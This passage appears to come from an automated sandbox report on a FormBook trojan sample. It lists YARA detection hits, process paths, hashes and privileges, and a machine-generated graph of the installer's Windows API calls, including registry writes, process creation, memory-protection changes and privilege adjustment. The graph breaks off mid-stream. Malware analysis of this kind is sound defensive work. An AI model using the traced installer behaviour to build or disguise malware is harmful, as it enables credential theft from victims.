                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:6
                                                                    Start time:12:27:52
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe"
                                                                    Imagebase:0xca0000
                                                                    File size:140'800 bytes
                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:12:28:05
                                                                    Start date:24/04/2024
                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                    Imagebase:0x7ff778990000
                                                                    File size:597'432 bytes
                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                      Execution Graph

                                                                      Execution Coverage:20.8%
                                                                      Dynamic/Decrypted Code Coverage:14.4%
                                                                      Signature Coverage:21.1%
                                                                      Total number of Nodes:1462
                                                                      Total number of Limit Nodes:34
3937 401beb 3932->3937 3933->3937 3934 402a3a 18 API calls 3938 401bfb 3934->3938 3935 401c06 3939 402a1d 18 API calls 3935->3939 3936 401c4a 3940 402a3a 18 API calls 3936->3940 3937->3934 3937->3938 3938->3935 3938->3936 3941 401c0b 3939->3941 3942 401c4f 3940->3942 3943 402a1d 18 API calls 3941->3943 3944 402a3a 18 API calls 3942->3944 3945 401c14 3943->3945 3946 401c58 FindWindowExA 3944->3946 3947 401c3a SendMessageA 3945->3947 3948 401c1c SendMessageTimeoutA 3945->3948 3949 401c76 3946->3949 3947->3949 3948->3949 4078 1000270b 4079 1000275b 4078->4079 4080 1000271b VirtualProtect 4078->4080 4080->4079 4801 1000180d 4802 10001830 4801->4802 4803 10001860 GlobalFree 4802->4803 4804 10001872 4802->4804 4803->4804 4805 10001266 2 API calls 4804->4805 4806 100019e3 GlobalFree GlobalFree 4805->4806 4528 401751 4529 402a3a 18 API calls 4528->4529 4530 401758 4529->4530 4531 401776 4530->4531 4532 40177e 4530->4532 4568 405d2f lstrcpynA 4531->4568 4569 405d2f lstrcpynA 4532->4569 4535 401789 4537 4057a1 3 API calls 4535->4537 4536 40177c 4539 405f9a 5 API calls 4536->4539 4538 40178f lstrcatA 4537->4538 4538->4536 4561 40179b 4539->4561 4540 406033 2 API calls 4540->4561 4541 4017dc 4543 40597d 2 API calls 4541->4543 4543->4561 4544 4017b2 CompareFileTime 4544->4561 4545 401876 4546 404f48 25 API calls 4545->4546 4549 401880 4546->4549 4547 404f48 25 API calls 4555 401862 4547->4555 4548 405d2f lstrcpynA 4548->4561 4550 402e9f 32 API calls 4549->4550 4551 401893 4550->4551 4552 4018a7 SetFileTime 4551->4552 4554 4018b9 CloseHandle 4551->4554 4552->4554 4553 405d51 18 API calls 4553->4561 4554->4555 4556 4018ca 4554->4556 4557 4018e2 4556->4557 4558 4018cf 4556->4558 4560 405d51 18 API calls 4557->4560 4559 405d51 18 API calls 4558->4559 4562 4018d7 lstrcatA 4559->4562 4563 4018ea 4560->4563 4561->4540 4561->4541 4561->4544 4561->4545 4561->4548 4561->4553 4564 405525 MessageBoxIndirectA 4561->4564 4566 40184d 4561->4566 4567 4059a2 GetFileAttributesA CreateFileA 
4561->4567 4562->4563 4563->4555 4565 405525 MessageBoxIndirectA 4563->4565 4564->4561 4565->4555 4566->4547 4566->4555 4567->4561 4568->4536 4569->4535 4807 401651 4808 402a3a 18 API calls 4807->4808 4809 401657 4808->4809 4810 406033 2 API calls 4809->4810 4811 40165d 4810->4811 4812 401951 4813 402a1d 18 API calls 4812->4813 4814 401958 4813->4814 4815 402a1d 18 API calls 4814->4815 4816 401962 4815->4816 4817 402a3a 18 API calls 4816->4817 4818 40196b 4817->4818 4819 40197e lstrlenA 4818->4819 4820 4019b9 4818->4820 4821 401988 4819->4821 4821->4820 4825 405d2f lstrcpynA 4821->4825 4823 4019a2 4823->4820 4824 4019af lstrlenA 4823->4824 4824->4820 4825->4823 4826 404352 4827 40437e 4826->4827 4828 40438f 4826->4828 4887 405509 GetDlgItemTextA 4827->4887 4829 40439b GetDlgItem 4828->4829 4836 4043fa 4828->4836 4831 4043af 4829->4831 4835 4043c3 SetWindowTextA 4831->4835 4840 40583a 4 API calls 4831->4840 4832 4044de 4837 404688 4832->4837 4889 405509 GetDlgItemTextA 4832->4889 4833 404389 4834 405f9a 5 API calls 4833->4834 4834->4828 4841 403f14 19 API calls 4835->4841 4836->4832 4836->4837 4842 405d51 18 API calls 4836->4842 4839 403f7b 8 API calls 4837->4839 4844 40469c 4839->4844 4845 4043b9 4840->4845 4846 4043df 4841->4846 4847 40446e SHBrowseForFolderA 4842->4847 4843 40450e 4848 40588f 18 API calls 4843->4848 4845->4835 4852 4057a1 3 API calls 4845->4852 4849 403f14 19 API calls 4846->4849 4847->4832 4850 404486 CoTaskMemFree 4847->4850 4851 404514 4848->4851 4853 4043ed 4849->4853 4854 4057a1 3 API calls 4850->4854 4890 405d2f lstrcpynA 4851->4890 4852->4835 4888 403f49 SendMessageA 4853->4888 4856 404493 4854->4856 4859 4044ca SetDlgItemTextA 4856->4859 4863 405d51 18 API calls 4856->4863 4858 4043f3 4862 4060c8 5 API calls 4858->4862 4859->4832 4860 40452b 4861 4060c8 5 API calls 4860->4861 4869 404532 4861->4869 4862->4836 4864 4044b2 lstrcmpiA 4863->4864 4864->4859 4866 4044c3 lstrcatA 4864->4866 4865 40456e 4891 405d2f lstrcpynA 4865->4891 4866->4859 
4868 404575 4870 40583a 4 API calls 4868->4870 4869->4865 4874 4057e8 2 API calls 4869->4874 4875 4045c6 4869->4875 4871 40457b GetDiskFreeSpaceA 4870->4871 4873 40459f MulDiv 4871->4873 4871->4875 4873->4875 4874->4869 4876 404637 4875->4876 4878 4047ce 21 API calls 4875->4878 4877 40465a 4876->4877 4879 40140b 2 API calls 4876->4879 4892 403f36 KiUserCallbackDispatcher 4877->4892 4880 404624 4878->4880 4879->4877 4881 404639 SetDlgItemTextA 4880->4881 4882 404629 4880->4882 4881->4876 4884 404709 21 API calls 4882->4884 4884->4876 4885 404676 4885->4837 4893 4042e7 4885->4893 4887->4833 4888->4858 4889->4843 4890->4860 4891->4868 4892->4885 4894 4042f5 4893->4894 4895 4042fa SendMessageA 4893->4895 4894->4895 4895->4837 4896 4019d2 4897 402a3a 18 API calls 4896->4897 4898 4019d9 4897->4898 4899 402a3a 18 API calls 4898->4899 4900 4019e2 4899->4900 4901 4019e9 lstrcmpiA 4900->4901 4902 4019fb lstrcmpA 4900->4902 4903 4019ef 4901->4903 4902->4903 4904 4021d2 4905 402a3a 18 API calls 4904->4905 4906 4021d8 4905->4906 4907 402a3a 18 API calls 4906->4907 4908 4021e1 4907->4908 4909 402a3a 18 API calls 4908->4909 4910 4021ea 4909->4910 4911 406033 2 API calls 4910->4911 4912 4021f3 4911->4912 4913 402204 lstrlenA lstrlenA 4912->4913 4917 4021f7 4912->4917 4915 404f48 25 API calls 4913->4915 4914 404f48 25 API calls 4918 4021ff 4914->4918 4916 402240 SHFileOperationA 4915->4916 4916->4917 4916->4918 4917->4914 4917->4918 4594 4014d6 4595 402a1d 18 API calls 4594->4595 4596 4014dc Sleep 4595->4596 4598 4028cf 4596->4598 4919 1000161a 4920 10001649 4919->4920 4921 10001a5d 18 API calls 4920->4921 4922 10001650 4921->4922 4923 10001663 4922->4923 4924 10001657 4922->4924 4925 1000168a 4923->4925 4926 1000166d 4923->4926 4927 10001266 2 API calls 4924->4927 4929 10001690 4925->4929 4930 100016b4 4925->4930 4928 100014e2 3 API calls 4926->4928 4934 10001661 4927->4934 4932 10001672 4928->4932 4933 10001559 3 API calls 4929->4933 4931 100014e2 3 API calls 4930->4931 
4931->4934 4935 10001559 3 API calls 4932->4935 4936 10001695 4933->4936 4937 10001678 4935->4937 4938 10001266 2 API calls 4936->4938 4939 10001266 2 API calls 4937->4939 4940 1000169b GlobalFree 4938->4940 4941 1000167e GlobalFree 4939->4941 4940->4934 4942 100016af GlobalFree 4940->4942 4941->4934 4942->4934 4943 40155b 4944 401577 ShowWindow 4943->4944 4945 40157e 4943->4945 4944->4945 4946 40158c ShowWindow 4945->4946 4947 4028cf 4945->4947 4946->4947 4612 40255c 4613 402a1d 18 API calls 4612->4613 4618 402566 4613->4618 4614 4025d0 4615 405a1a ReadFile 4615->4618 4616 4025d2 4621 405c8d wsprintfA 4616->4621 4617 4025e2 4617->4614 4620 4025f8 SetFilePointer 4617->4620 4618->4614 4618->4615 4618->4616 4618->4617 4620->4614 4621->4614 4948 40405d 4949 404073 4948->4949 4950 40417f 4948->4950 4953 403f14 19 API calls 4949->4953 4951 4041ee 4950->4951 4956 4042c2 4950->4956 4960 4041c3 GetDlgItem SendMessageA 4950->4960 4952 4041f8 GetDlgItem 4951->4952 4951->4956 4955 40420e 4952->4955 4959 404280 4952->4959 4954 4040c9 4953->4954 4958 403f14 19 API calls 4954->4958 4955->4959 4963 404234 6 API calls 4955->4963 4957 403f7b 8 API calls 4956->4957 4961 4042bd 4957->4961 4962 4040d6 CheckDlgButton 4958->4962 4959->4956 4964 404292 4959->4964 4979 403f36 KiUserCallbackDispatcher 4960->4979 4977 403f36 KiUserCallbackDispatcher 4962->4977 4963->4959 4967 404298 SendMessageA 4964->4967 4968 4042a9 4964->4968 4967->4968 4968->4961 4972 4042af SendMessageA 4968->4972 4969 4041e9 4970 4042e7 SendMessageA 4969->4970 4970->4951 4971 4040f4 GetDlgItem 4978 403f49 SendMessageA 4971->4978 4972->4961 4974 40410a SendMessageA 4975 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4974->4975 4976 404128 GetSysColor 4974->4976 4975->4961 4976->4975 4977->4971 4978->4974 4979->4969 4980 40205e 4981 402a3a 18 API calls 4980->4981 4982 402065 4981->4982 4983 402a3a 18 API calls 4982->4983 4984 40206f 4983->4984 4985 402a3a 18 API calls 4984->4985 4986 402079 
4985->4986 4987 402a3a 18 API calls 4986->4987 4988 402083 4987->4988 4989 402a3a 18 API calls 4988->4989 4990 40208d 4989->4990 4991 4020cc CoCreateInstance 4990->4991 4992 402a3a 18 API calls 4990->4992 4995 4020eb 4991->4995 4997 402193 4991->4997 4992->4991 4993 401423 25 API calls 4994 4021c9 4993->4994 4996 402173 MultiByteToWideChar 4995->4996 4995->4997 4996->4997 4997->4993 4997->4994 4998 40265e 4999 402664 4998->4999 5000 402668 FindNextFileA 4999->5000 5003 40267a 4999->5003 5001 4026b9 5000->5001 5000->5003 5004 405d2f lstrcpynA 5001->5004 5004->5003 5005 401cde GetDlgItem GetClientRect 5006 402a3a 18 API calls 5005->5006 5007 401d0e LoadImageA SendMessageA 5006->5007 5008 401d2c DeleteObject 5007->5008 5009 4028cf 5007->5009 5008->5009 5010 401662 5011 402a3a 18 API calls 5010->5011 5012 401669 5011->5012 5013 402a3a 18 API calls 5012->5013 5014 401672 5013->5014 5015 402a3a 18 API calls 5014->5015 5016 40167b MoveFileA 5015->5016 5017 40168e 5016->5017 5023 401687 5016->5023 5019 406033 2 API calls 5017->5019 5021 4021c9 5017->5021 5018 401423 25 API calls 5018->5021 5020 40169d 5019->5020 5020->5021 5022 405bea 38 API calls 5020->5022 5022->5023 5023->5018 3771 402364 3772 40236a 3771->3772 3788 402a3a 3772->3788 3775 402a3a 18 API calls 3776 402386 RegCreateKeyExA 3775->3776 3777 4026a6 3776->3777 3779 4023b0 3776->3779 3778 4023c8 3781 4023d4 3778->3781 3794 402a1d 3778->3794 3779->3778 3780 402a3a 18 API calls 3779->3780 3782 4023c1 lstrlenA 3780->3782 3784 4023ef RegSetValueExA 3781->3784 3797 402e9f 3781->3797 3782->3778 3786 402405 RegCloseKey 3784->3786 3786->3777 3789 402a46 3788->3789 3790 405d51 18 API calls 3789->3790 3791 402a67 3790->3791 3792 40237c 3791->3792 3793 405f9a 5 API calls 3791->3793 3792->3775 3793->3792 3795 405d51 18 API calls 3794->3795 3796 402a31 3795->3796 3796->3781 3799 402eb5 3797->3799 3798 402ee3 3817 4030b1 3798->3817 3799->3798 3833 4030c7 SetFilePointer 3799->3833 3803 402f00 GetTickCount 3806 403034 
3803->3806 3813 402f4f 3803->3813 3804 40304a 3805 40308c 3804->3805 3810 40304e 3804->3810 3807 4030b1 ReadFile 3805->3807 3806->3784 3807->3806 3808 4030b1 ReadFile 3808->3813 3809 4030b1 ReadFile 3809->3810 3810->3806 3810->3809 3811 405a49 WriteFile 3810->3811 3811->3810 3812 402fa5 GetTickCount 3812->3813 3813->3806 3813->3808 3813->3812 3814 402fca MulDiv wsprintfA 3813->3814 3831 405a49 WriteFile 3813->3831 3820 404f48 3814->3820 3834 405a1a ReadFile 3817->3834 3821 404f63 3820->3821 3830 405006 3820->3830 3822 404f80 lstrlenA 3821->3822 3823 405d51 18 API calls 3821->3823 3824 404fa9 3822->3824 3825 404f8e lstrlenA 3822->3825 3823->3822 3827 404fbc 3824->3827 3828 404faf SetWindowTextA 3824->3828 3826 404fa0 lstrcatA 3825->3826 3825->3830 3826->3824 3829 404fc2 SendMessageA SendMessageA SendMessageA 3827->3829 3827->3830 3828->3827 3829->3830 3830->3813 3832 405a67 3831->3832 3832->3813 3833->3798 3835 402eee 3834->3835 3835->3803 3835->3804 3835->3806 5024 401dea 5025 402a3a 18 API calls 5024->5025 5026 401df0 5025->5026 5027 402a3a 18 API calls 5026->5027 5028 401df9 5027->5028 5029 402a3a 18 API calls 5028->5029 5030 401e02 5029->5030 5031 402a3a 18 API calls 5030->5031 5032 401e0b 5031->5032 5033 401423 25 API calls 5032->5033 5034 401e12 ShellExecuteA 5033->5034 5035 401e3f 5034->5035 5036 40366d 5037 403678 5036->5037 5038 40367c 5037->5038 5039 40367f GlobalAlloc 5037->5039 5039->5038 5040 401eee 5041 402a3a 18 API calls 5040->5041 5042 401ef5 5041->5042 5043 4060c8 5 API calls 5042->5043 5044 401f04 5043->5044 5045 401f1c GlobalAlloc 5044->5045 5046 401f84 5044->5046 5045->5046 5047 401f30 5045->5047 5048 4060c8 5 API calls 5047->5048 5049 401f37 5048->5049 5050 4060c8 5 API calls 5049->5050 5051 401f41 5050->5051 5051->5046 5055 405c8d wsprintfA 5051->5055 5053 401f78 5056 405c8d wsprintfA 5053->5056 5055->5053 5056->5046 5057 4014f0 SetForegroundWindow 5058 4028cf 5057->5058 5059 100015b3 5060 100014bb GlobalFree 5059->5060 5061 100015cb 
5060->5061 5062 10001611 GlobalFree 5061->5062 5063 100015e6 5061->5063 5064 100015fd VirtualFree 5061->5064 5063->5062 5064->5062 5070 4018f5 5071 40192c 5070->5071 5072 402a3a 18 API calls 5071->5072 5073 401931 5072->5073 5074 4055d1 69 API calls 5073->5074 5075 40193a 5074->5075 5076 4024f7 5077 402a3a 18 API calls 5076->5077 5078 4024fe 5077->5078 5081 4059a2 GetFileAttributesA CreateFileA 5078->5081 5080 40250a 5081->5080 5082 4018f8 5083 402a3a 18 API calls 5082->5083 5084 4018ff 5083->5084 5085 405525 MessageBoxIndirectA 5084->5085 5086 401908 5085->5086 5087 1000103d 5088 1000101b 5 API calls 5087->5088 5089 10001056 5088->5089 5090 4014fe 5091 401506 5090->5091 5093 401519 5090->5093 5092 402a1d 18 API calls 5091->5092 5092->5093 5094 402b7f 5095 402ba7 5094->5095 5096 402b8e SetTimer 5094->5096 5097 402bfc 5095->5097 5098 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5095->5098 5096->5095 5098->5097 5099 401000 5100 401037 BeginPaint GetClientRect 5099->5100 5101 40100c DefWindowProcA 5099->5101 5102 4010f3 5100->5102 5104 401179 5101->5104 5105 401073 CreateBrushIndirect FillRect DeleteObject 5102->5105 5106 4010fc 5102->5106 5105->5102 5107 401102 CreateFontIndirectA 5106->5107 5108 401167 EndPaint 5106->5108 5107->5108 5109 401112 6 API calls 5107->5109 5108->5104 5109->5108 5110 402482 5111 402b44 19 API calls 5110->5111 5112 40248c 5111->5112 5113 402a1d 18 API calls 5112->5113 5114 402495 5113->5114 5115 4024b8 RegEnumValueA 5114->5115 5116 4024ac RegEnumKeyA 5114->5116 5118 4026a6 5114->5118 5117 4024d1 RegCloseKey 5115->5117 5115->5118 5116->5117 5117->5118 5120 401b02 5121 402a3a 18 API calls 5120->5121 5122 401b09 5121->5122 5123 402a1d 18 API calls 5122->5123 5124 401b12 wsprintfA 5123->5124 5125 4028cf 5124->5125 5126 401a03 5127 402a3a 18 API calls 5126->5127 5128 401a0c ExpandEnvironmentStringsA 5127->5128 5129 401a20 5128->5129 5131 401a33 5128->5131 5130 401a25 lstrcmpA 5129->5130 5129->5131 5130->5131 5132 402283 5133 402291 
5132->5133 5134 40228b 5132->5134 5136 4022a1 5133->5136 5137 402a3a 18 API calls 5133->5137 5135 402a3a 18 API calls 5134->5135 5135->5133 5138 4022af 5136->5138 5139 402a3a 18 API calls 5136->5139 5137->5136 5140 402a3a 18 API calls 5138->5140 5139->5138 5141 4022b8 WritePrivateProfileStringA 5140->5141 5142 100029c3 5143 100029db 5142->5143 5144 10001534 2 API calls 5143->5144 5145 100029f6 5144->5145 3836 405086 3837 405231 3836->3837 3838 4050a8 GetDlgItem GetDlgItem GetDlgItem 3836->3838 3840 405261 3837->3840 3841 405239 GetDlgItem CreateThread CloseHandle 3837->3841 3882 403f49 SendMessageA 3838->3882 3843 40528f 3840->3843 3844 4052b0 3840->3844 3845 405277 ShowWindow ShowWindow 3840->3845 3841->3840 3885 40501a OleInitialize 3841->3885 3842 405118 3848 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3842->3848 3846 405297 3843->3846 3847 4052ea 3843->3847 3852 403f7b 8 API calls 3844->3852 3884 403f49 SendMessageA 3845->3884 3850 4052c3 ShowWindow 3846->3850 3851 40529f 3846->3851 3847->3844 3857 4052f7 SendMessageA 3847->3857 3855 405171 SendMessageA SendMessageA 3848->3855 3856 40518d 3848->3856 3853 4052e3 3850->3853 3854 4052d5 3850->3854 3858 403eed SendMessageA 3851->3858 3859 4052bc 3852->3859 3861 403eed SendMessageA 3853->3861 3860 404f48 25 API calls 3854->3860 3855->3856 3862 4051a0 3856->3862 3863 405192 SendMessageA 3856->3863 3857->3859 3864 405310 CreatePopupMenu 3857->3864 3858->3844 3860->3853 3861->3847 3866 403f14 19 API calls 3862->3866 3863->3862 3865 405d51 18 API calls 3864->3865 3867 405320 AppendMenuA 3865->3867 3868 4051b0 3866->3868 3869 405351 TrackPopupMenu 3867->3869 3870 40533e GetWindowRect 3867->3870 3871 4051b9 ShowWindow 3868->3871 3872 4051ed GetDlgItem SendMessageA 3868->3872 3869->3859 3874 40536d 3869->3874 3870->3869 3875 4051dc 3871->3875 3876 4051cf ShowWindow 3871->3876 3872->3859 3873 405214 SendMessageA SendMessageA 3872->3873 3873->3859 3877 40538c SendMessageA 3874->3877 3883 403f49 
SendMessageA 3875->3883 3876->3875 3877->3877 3879 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3877->3879 3880 4053cb SendMessageA 3879->3880 3880->3880 3881 4053ed GlobalUnlock SetClipboardData CloseClipboard 3880->3881 3881->3859 3882->3842 3883->3872 3884->3843 3886 403f60 SendMessageA 3885->3886 3887 40503d 3886->3887 3890 401389 2 API calls 3887->3890 3891 405064 3887->3891 3888 403f60 SendMessageA 3889 405076 OleUninitialize 3888->3889 3890->3887 3891->3888 3892 402308 3893 402338 3892->3893 3894 40230d 3892->3894 3895 402a3a 18 API calls 3893->3895 3904 402b44 3894->3904 3898 40233f 3895->3898 3897 402314 3899 40231e 3897->3899 3903 402355 3897->3903 3908 402a7a RegOpenKeyExA 3898->3908 3900 402a3a 18 API calls 3899->3900 3901 402325 RegDeleteValueA RegCloseKey 3900->3901 3901->3903 3905 402a3a 18 API calls 3904->3905 3906 402b5d 3905->3906 3907 402b6b RegOpenKeyExA 3906->3907 3907->3897 3909 402b0e 3908->3909 3917 402aa5 3908->3917 3909->3903 3910 402acb RegEnumKeyA 3911 402add RegCloseKey 3910->3911 3910->3917 3919 4060c8 GetModuleHandleA 3911->3919 3912 402b02 RegCloseKey 3916 402af1 3912->3916 3914 402a7a 5 API calls 3914->3917 3916->3909 3917->3910 3917->3911 3917->3912 3917->3914 3918 402b1d RegDeleteKeyA 3918->3916 3920 4060e4 3919->3920 3921 4060ee GetProcAddress 3919->3921 3925 40605a GetSystemDirectoryA 3920->3925 3923 402aed 3921->3923 3923->3916 3923->3918 3924 4060ea 3924->3921 3924->3923 3926 40607c wsprintfA LoadLibraryExA 3925->3926 3926->3924 5146 402688 5147 402a3a 18 API calls 5146->5147 5148 40268f FindFirstFileA 5147->5148 5149 4026b2 5148->5149 5152 4026a2 5148->5152 5150 4026b9 5149->5150 5154 405c8d wsprintfA 5149->5154 5155 405d2f lstrcpynA 5150->5155 5154->5150 5155->5152 5156 401c8a 5157 402a1d 18 API calls 5156->5157 5158 401c90 IsWindow 5157->5158 5159 4019f3 5158->5159 5160 40430b 5161 404341 5160->5161 5162 40431b 5160->5162 5164 403f7b 8 API calls 5161->5164 5163 403f14 19 API calls 5162->5163 5165 404328 
SetDlgItemTextA 5163->5165 5166 40434d 5164->5166 5165->5161 4081 40310f SetErrorMode GetVersion 4082 403146 4081->4082 4083 40314c 4081->4083 4084 4060c8 5 API calls 4082->4084 4085 40605a 3 API calls 4083->4085 4084->4083 4086 403162 lstrlenA 4085->4086 4086->4083 4087 403171 4086->4087 4088 4060c8 5 API calls 4087->4088 4089 403179 4088->4089 4090 4060c8 5 API calls 4089->4090 4091 403180 #17 OleInitialize SHGetFileInfoA 4090->4091 4169 405d2f lstrcpynA 4091->4169 4093 4031bd GetCommandLineA 4170 405d2f lstrcpynA 4093->4170 4095 4031cf GetModuleHandleA 4096 4031e6 4095->4096 4097 4057cc CharNextA 4096->4097 4098 4031fa CharNextA 4097->4098 4106 40320a 4098->4106 4099 4032d4 4100 4032e7 GetTempPathA 4099->4100 4171 4030de 4100->4171 4102 4032ff 4103 403303 GetWindowsDirectoryA lstrcatA 4102->4103 4104 403359 DeleteFileA 4102->4104 4107 4030de 12 API calls 4103->4107 4181 402c66 GetTickCount GetModuleFileNameA 4104->4181 4105 4057cc CharNextA 4105->4106 4106->4099 4106->4105 4110 4032d6 4106->4110 4109 40331f 4107->4109 4109->4104 4113 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4109->4113 4265 405d2f lstrcpynA 4110->4265 4111 40336d 4116 4033f3 4111->4116 4117 4057cc CharNextA 4111->4117 4165 403403 4111->4165 4115 4030de 12 API calls 4113->4115 4119 403351 4115->4119 4209 4036af 4116->4209 4121 403388 4117->4121 4119->4104 4119->4165 4128 403433 4121->4128 4129 4033ce 4121->4129 4122 40353b 4125 403543 GetCurrentProcess OpenProcessToken 4122->4125 4126 4035bd ExitProcess 4122->4126 4123 40341d 4275 405525 4123->4275 4131 40358e 4125->4131 4132 40355e LookupPrivilegeValueA AdjustTokenPrivileges 4125->4132 4279 4054a8 4128->4279 4133 40588f 18 API calls 4129->4133 4135 4060c8 5 API calls 4131->4135 4132->4131 4136 4033d9 4133->4136 4138 403595 4135->4138 4136->4165 4266 405d2f lstrcpynA 4136->4266 4141 4035aa ExitWindowsEx 4138->4141 4142 4035b6 4138->4142 4139 403454 lstrcatA lstrcmpiA 4144 403470 4139->4144 4139->4165 4140 403449 
lstrcatA 4140->4139 4141->4126 4141->4142 4145 40140b 2 API calls 4142->4145 4147 403475 4144->4147 4148 40347c 4144->4148 4145->4126 4146 4033e8 4267 405d2f lstrcpynA 4146->4267 4282 40540e CreateDirectoryA 4147->4282 4287 40548b CreateDirectoryA 4148->4287 4152 403481 SetCurrentDirectoryA 4154 403490 4152->4154 4155 40349b 4152->4155 4290 405d2f lstrcpynA 4154->4290 4291 405d2f lstrcpynA 4155->4291 4158 4034a9 4159 405d51 18 API calls 4158->4159 4162 40352f 4158->4162 4164 405bea 38 API calls 4158->4164 4166 405d51 18 API calls 4158->4166 4168 40351b CloseHandle 4158->4168 4292 4054c0 CreateProcessA 4158->4292 4160 4034da DeleteFileA 4159->4160 4160->4158 4161 4034e7 CopyFileA 4160->4161 4161->4158 4163 405bea 38 API calls 4162->4163 4163->4165 4164->4158 4268 4035d5 4165->4268 4166->4158 4168->4158 4169->4093 4170->4095 4172 405f9a 5 API calls 4171->4172 4173 4030ea 4172->4173 4174 4030f4 4173->4174 4175 4057a1 3 API calls 4173->4175 4174->4102 4176 4030fc 4175->4176 4177 40548b 2 API calls 4176->4177 4178 403102 4177->4178 4295 4059d1 4178->4295 4299 4059a2 GetFileAttributesA CreateFileA 4181->4299 4183 402ca6 4204 402cb6 4183->4204 4300 405d2f lstrcpynA 4183->4300 4185 402ccc 4186 4057e8 2 API calls 4185->4186 4187 402cd2 4186->4187 4301 405d2f lstrcpynA 4187->4301 4189 402cdd GetFileSize 4190 402cf4 4189->4190 4191 402dd9 4189->4191 4190->4191 4194 4030b1 ReadFile 4190->4194 4196 402e45 4190->4196 4190->4204 4205 402c02 6 API calls 4190->4205 4302 402c02 4191->4302 4193 402de2 4195 402e12 GlobalAlloc 4193->4195 4193->4204 4314 4030c7 SetFilePointer 4193->4314 4194->4190 4313 4030c7 SetFilePointer 4195->4313 4200 402c02 6 API calls 4196->4200 4199 402e2d 4203 402e9f 32 API calls 4199->4203 4200->4204 4201 402dfb 4202 4030b1 ReadFile 4201->4202 4206 402e06 4202->4206 4207 402e39 4203->4207 4204->4111 4205->4190 4206->4195 4206->4204 4207->4204 4208 402e76 SetFilePointer 4207->4208 4208->4204 4210 4060c8 5 API calls 4209->4210 4211 4036c3 4210->4211 4212 4036c9 
4211->4212 4213 4036db 4211->4213 4328 405c8d wsprintfA 4212->4328 4214 405c16 3 API calls 4213->4214 4215 403706 4214->4215 4216 403724 lstrcatA 4215->4216 4218 405c16 3 API calls 4215->4218 4219 4036d9 4216->4219 4218->4216 4319 403974 4219->4319 4222 40588f 18 API calls 4223 403756 4222->4223 4224 4037df 4223->4224 4226 405c16 3 API calls 4223->4226 4225 40588f 18 API calls 4224->4225 4227 4037e5 4225->4227 4228 403782 4226->4228 4229 4037f5 LoadImageA 4227->4229 4232 405d51 18 API calls 4227->4232 4228->4224 4235 40379e lstrlenA 4228->4235 4238 4057cc CharNextA 4228->4238 4230 40389b 4229->4230 4231 40381c RegisterClassA 4229->4231 4234 40140b 2 API calls 4230->4234 4233 403852 SystemParametersInfoA CreateWindowExA 4231->4233 4264 4038a5 4231->4264 4232->4229 4233->4230 4240 4038a1 4234->4240 4236 4037d2 4235->4236 4237 4037ac lstrcmpiA 4235->4237 4241 4057a1 3 API calls 4236->4241 4237->4236 4239 4037bc GetFileAttributesA 4237->4239 4242 40379c 4238->4242 4243 4037c8 4239->4243 4244 403974 19 API calls 4240->4244 4240->4264 4245 4037d8 4241->4245 4242->4235 4243->4236 4246 4057e8 2 API calls 4243->4246 4247 4038b2 4244->4247 4329 405d2f lstrcpynA 4245->4329 4246->4236 4249 403941 4247->4249 4250 4038be ShowWindow 4247->4250 4251 40501a 5 API calls 4249->4251 4252 40605a 3 API calls 4250->4252 4253 403947 4251->4253 4254 4038d6 4252->4254 4255 403963 4253->4255 4256 40394b 4253->4256 4257 4038e4 GetClassInfoA 4254->4257 4259 40605a 3 API calls 4254->4259 4258 40140b 2 API calls 4255->4258 4263 40140b 2 API calls 4256->4263 4256->4264 4260 4038f8 GetClassInfoA RegisterClassA 4257->4260 4261 40390e DialogBoxParamA 4257->4261 4258->4264 4259->4257 4260->4261 4262 40140b 2 API calls 4261->4262 4262->4264 4263->4264 4264->4165 4265->4100 4266->4146 4267->4116 4269 4035ed 4268->4269 4270 4035df CloseHandle 4268->4270 4331 40361a 4269->4331 4270->4269 4273 4055d1 69 API calls 4274 40340c OleUninitialize 4273->4274 4274->4122 4274->4123 4277 40553a 4275->4277 4276 
